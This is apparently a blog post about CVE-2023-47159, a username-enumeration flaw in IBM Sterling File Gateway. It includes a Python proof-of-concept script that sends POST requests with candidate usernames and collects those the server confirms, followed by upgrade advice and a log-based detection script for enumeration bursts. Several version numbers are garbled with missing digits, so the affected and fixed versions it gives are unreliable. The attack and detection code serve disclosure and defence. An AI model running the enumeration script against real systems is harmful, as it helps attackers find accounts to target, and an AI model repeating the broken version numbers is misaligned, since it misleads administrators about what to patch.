A recently discovered vulnerability in IBM Sterling File Gateway (SFG) versions 6... through 6.1.2.5 and 6.2.. through 6.2..1 allows authenticated attackers to potentially obtain a list of valid usernames. IBM has assigned the identifier CVE-2023-47159 to this security flaw. The vulnerability is due to an observable discrepancy in request responses, which lets an authenticated attacker enumerate usernames and, consequently, launch more targeted attacks. This blog post delves into the details of this CVE, including how it works, example code snippets, and links to original references.

Vulnerability Details

The issue resides in the discrepancy between the request responses for valid and invalid usernames in the IBM Sterling File Gateway application. By making use of this observable difference, an authenticated attacker can systematically test for legitimate usernames. Upon establishing this list, the attacker may then exploit other vulnerabilities or attempt brute-force attacks more effectively, leading to potential unauthorized access or further data compromise.

To demonstrate the vulnerability, consider the following Python code snippet:

import requests

# Set target URL, authenticated session token, and usernames to test
url = "https://example.com/ibm_sfg/user-management"
session_token = "YOUR_SESSION_TOKEN"
usernames_to_test = ['admin', 'testuser', 'jdoe']

# Headers with authenticated session token
headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {session_token}'
}

def enumerate_usernames():
    valid_usernames = []
    
    for username in usernames_to_test:
        # Request payload containing the username
        payload = {'userName': username}

        response = requests.post(url, headers=headers, json=payload)

        # Checking for valid username based on response discrepancy
        if "Valid_User_Response" in response.text:
            valid_usernames.append(username)
            print(f'Valid username found: {username}')

    print("\nEnumeration Complete.")
    print(f"Valid Usernames: {valid_usernames}")

enumerate_usernames()

In this example, replace YOUR_SESSION_TOKEN with an authenticated session token in the session_token variable and https://example.com with the target SFG application URL. The code sends POST requests with different usernames for testing. Upon receiving a different response for a valid username, the code identifies it and adds it to a list of valid usernames.

Mitigation

IBM has acknowledged this vulnerability and recommends upgrading to IBM Sterling File Gateway versions 6.1.3. or 6.2..2, which address the issue. Updating to these versions should eliminate the observable discrepancy in request responses, thereby preventing user enumeration attacks. For more details on the official fix and announcement, please refer to the original IBM Security Bulletin.
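
On the detection side, the pattern described above (one authenticated principal looking up many distinct usernames in a short time) can be flagged from request logs. The following is an added example, not code from IBM or from the original post; the log format, the principal names, the window and the threshold are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log, one request per line (hypothetical format, not SFG's own):
#   <ISO timestamp> <authenticated principal> <method> <path> <username looked up>
_NAMES = ["admin", "testuser", "jdoe", "asmith", "bwong", "root", "ops", "svc"]
SAMPLE_LOG = "\n".join(
    # "mallory" probes 8 distinct usernames in 8 seconds
    [f"2025-01-27T10:00:{i:02d} mallory POST /ibm_sfg/user-management {n}"
     for i, n in enumerate(_NAMES)]
    # "helpdesk" looks up the same 8 names, but only one per minute
    + [f"2025-01-27T10:{i:02d}:30 helpdesk POST /ibm_sfg/user-management {n}"
       for i, n in enumerate(_NAMES)]
    + ["garbage line"]  # malformed input must be skipped, not crash the scan
)

WINDOW = timedelta(seconds=60)  # assumed sliding window
MAX_DISTINCT = 5                # assumed limit on distinct usernames per window


def parse_line(line):
    """Return (timestamp, principal, looked_up_username), or None if malformed."""
    parts = line.split()
    if len(parts) != 5:
        return None
    try:
        return datetime.fromisoformat(parts[0]), parts[1], parts[4]
    except ValueError:
        return None


def find_enumerators(log_text, window=WINDOW, max_distinct=MAX_DISTINCT):
    """Map each flagged principal to the peak count of distinct usernames it
    looked up inside one window. Lines must be time-ordered per principal."""
    recent = defaultdict(deque)  # principal -> (timestamp, username) pairs in window
    flagged = {}
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        ts, principal, target = event
        queue = recent[principal]
        queue.append((ts, target))
        while ts - queue[0][0] > window:  # drop lookups older than the window
            queue.popleft()
        distinct = len({name for _, name in queue})
        if distinct > max_distinct:
            flagged[principal] = max(flagged.get(principal, 0), distinct)
    return flagged
```

Calling `find_enumerators(SAMPLE_LOG)` flags only the burst from `mallory`; the slow, legitimate-looking lookups from `helpdesk` stay under the threshold. Because the attacker is authenticated, keying on the session principal rather than the source IP keeps the signal intact when requests come through a shared proxy.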

Conclusion

CVE-2023-47159 affects IBM Sterling File Gateway versions 6... through 6.1.2.5 and 6.2.. through 6.2..1, enabling authenticated attackers to enumerate usernames. By exploiting this vulnerability, attackers may gather information useful for more sophisticated or targeted attacks, such as brute-force attempts and phishing campaigns. The best way to safeguard against this and similar vulnerabilities is to keep software and systems up to date with the latest security patches and measures.

Timeline

Published on: 01/27/2025 16:15:29 UTC